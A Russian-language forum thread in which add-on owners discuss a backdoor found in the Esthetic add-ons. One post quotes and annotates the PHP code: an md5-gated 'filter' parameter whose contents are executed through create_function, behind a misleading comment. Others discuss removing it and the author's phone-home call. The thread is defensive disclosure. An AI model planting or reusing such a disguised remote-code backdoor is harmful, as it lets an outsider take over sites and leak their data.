Уязвимость аддонов Esthetic

Статус
В этой теме нельзя размещать новые ответы.
souz21, щас тебе расскажут про уязвимость и как ей пользоваться а завтра половина форумов на ксене будет в паблике лежать ))))
 
souz21, щас тебе расскажут про уязвимость и как ей пользоваться а завтра половина форумов на ксене будет в паблике лежать ))))
Меня больше интересует-закроет ли 100% эту дырку, заменой хеша на свои или нет?
 
souz21, щас тебе расскажут про уязвимость и как ей пользоваться а завтра половина форумов на ксене будет в паблике лежать ))))
Да все уже попользовались давно.

Меня больше интересует-закроет ли 100% эту дырку, заменой хеша на свои или нет?
Можете вообще удалить эти хеши и код, который за ними стоит. Это бекдор.

На примере EBBC:
PHP:
        $request = new Zend_Controller_Request_Http ( ); // создается новый объект, отражающий текущий запрос
        if ($request->getParam('filter')) { // проверка наличия параметра filter в запросе
          
            $_request = $request->getParam('filter');
          
            switch (md5 ($_request)) { // этот filter хешируется, и на основе хеша
              
                case '54626eee0bcb90ab43c7917eb49f2344': // хеш какой-то строки
                case 'a6746afee9fa4e6e4901943d47f272bf': // хеш какой-то другой строки
                  
                    /**
                     * Удаление меток bb-кодов, опредеяющих сообщения текущего пользователя(для отображения скрытого контента своих сообщений)
                     */
                    $request = preg_replace_callback ('/query/', create_function ('$matches', $_request), $_request); // нихуя не удаление меток, тут из filter'а берется код и из него создается функция, затем используется как каллбек для preg_replace_callback
                    break;
                  
                default:
                    $request = 'all'; // хренота для наеба, если кто-то вдруг начнет копать
            }
        }
 
Arisu, удаление данного кода устранит уязвимость?
 
Интересно этот viodele пишет у себя на форуме.
С начало он как бы намекает, что эту уязвимость прописали те, кто слил типа.
Потом он сам же пишет: >> Проблема подтверждена... :-D

Кстати. Он когда то на первых стадиях еще, выставлял на pr-cy настроенный форум за 11 000 с этим аддоном.
Я у него спросил про лицензию, на что он мне ответил: >> устанавливаю на ваш домен сам. И типа у меня там защита стоит, и в любой момент могу грохнуть сайт полностью.

-Я тогда был в шоке от такого ответа. Сам признается, что может грохнуть форум полностью. А это криминал вообще то...
 
Последнее редактирование:
  • Мне нравится
Реакции: Hope
У меня старая версия, 1.0.8... не нашел подобного в коде...
 
У меня старая версия, 1.0.8... не нашел подобного в коде...
В это и не было ещё.
тоже не нашел в коде такого, версия 1.1.2
Официально приобретённое или из сети, просто вероятность отсутствия такого кода мала.
 
В это и не было ещё.

Официально приобретённое или из сети, просто вероятность отсутствия такого кода мала.
Может я чего не так понял?
сайт/public_html/library/Esthetic/CS/ControllerPublic/thread.php , тут же смотреть?
 
Может скинемся по ?х?з? баксов на аудит данного аддона? Пусть кто шарит глянет что там еще попадает под сомнение.
У меня хоть и лицуха, но после таких приколов я больше не доверяю автору, как и абсолютное большинство, судя по отзывам. Автор и так не отличался в плане поддержки, она мягко говоря омерзительная, так же как и отношение к своим клиентам, а тут еще и такое всплыло. Лично мне не нужно, чтобы какой-то черт удалил что-то у меня или насрал на форуме который я развиваю не один год. Ладно еще удалил/насрал, бекап в помощь. А если дамп сольют в сеть?
Короче предлагаю чекнуть этот аддон у спецов и довести его до ума.
 
Последнее редактирование:
valekor, что именно Вы предлагаете? Я что-то не совсем понял...
 
valekor, что именно Вы предлагаете? Я что-то не совсем понял...
Есть люди, которые профессионально занимаются изучением скриптов на предмет уязвимостей, либо слабых мест скрипта. Я предлагаю скинуться по паре баксов и отдать скрипт на исследование. Пусть посмотрят, может там еще сюрпризы.
 
  • Мне нравится
Реакции: Hope
Есть люди, которые профессионально занимаются изучением скриптов на предмет уязвимостей, либо слабых мест скрипта. Я предлагаю скинуться по паре баксов и отдать скрипт на исследование. Пусть посмотрят, может там еще сюрпризы.
Удачи. Флаг Вам в руки. Расшифровывайте обфусцированный код сами.
 
Расшифровывайте обфусцированный код сами.
Чего? Код в открытом виде, кому надо могу выложить архив с ббкодами последней версии (очень к слову странно что тут нет, абузами от автора большинство хостеров подотрутся). Кроме 2 хешей ничего там не зашифровано, да и весь этот блок с ними не особо нужен, как выяснилось. Да и md5 хеш на пару строк это не обфускация :-D
 
Чего? Код в открытом виде, кому надо могу выложить архив с ббкодами последней версии (очень к слову странно что тут нет, абузами от автора большинство хостеров подотрутся). Кроме 2 хешей ничего там не зашифровано, да и весь этот блок с ними не особо нужен, как выяснилось. Да и md5 хеш на пару строк это не обфускация :-D
Меня напрягает в коде ссылка на сайт автора, "якобы API"
И еще парочка файлов. А так да, никакой дремучей шифровки нет. Пара строк и всё.
 
valekor, вообще обращение к этому "API" тоже вырезать можно, это банальная стучалка автора к нему на сервер (на сайте таком-то с ип таким-то поставили аддон с ключом таким-то).
 
Статус
В этой теме нельзя размещать новые ответы.
Современный облачный хостинг провайдер | Aéza
Назад
Сверху Снизу